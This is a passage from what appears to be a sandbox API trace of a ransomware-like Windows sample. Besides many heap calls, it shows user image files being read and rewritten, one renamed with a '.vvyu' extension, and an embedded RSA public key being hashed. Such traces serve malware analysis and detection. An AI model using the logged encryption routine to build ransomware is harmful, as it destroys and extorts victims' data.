0x2c99d28 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.834] GetCurrentThreadId () returned 0x66c [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea79c8 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.835] GetCurrentThreadId () returned 0x66c [0199.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0199.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f6a8 | out: hHeap=0x620000) returned 1 [0199.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.847] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x6766, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x6766, lpOverlapped=0x0) returned 1 [0199.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0199.848] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x676b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.848] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.850] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.851] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.851] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.851] CloseHandle (hObject=0x510) returned 1 [0199.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.853] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\Ae6i4Hslrl.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ae6i4hslrl.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\Ae6i4Hslrl.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ae6i4hslrl.png.vvyu")) returned 1 [0199.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.855] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.858] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b5df2f0, ftCreationTime.dwHighDateTime=0x1d8a59c, ftLastAccessTime.dwLowDateTime=0x22722d0, ftLastAccessTime.dwHighDateTime=0x1d8a5e6, ftLastWriteTime.dwLowDateTime=0x22722d0, ftLastWriteTime.dwHighDateTime=0x1d8a5e6, nFileSizeHigh=0x0, nFileSizeLow=0xf0d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dTf66.png", cAlternateFileName="")) returned 1 [0199.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91710 [0199.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.858] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\dTf66.png") returned=".png" [0199.858] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\dTf66.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\dtf66.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.859] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=61648) returned 1 [0199.859] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.862] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf0aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.862] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.865] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.865] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf0d0, lpOverlapped=0x0) returned 1 [0199.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.866] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.867] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.867] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.867] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.867] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.867] GetLastError () returned 0x0 [0199.868] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.868] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.868] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.868] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.868] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0d0) returned 0x2ea99b0 [0199.869] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f6a8 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f6f0 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.870] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: 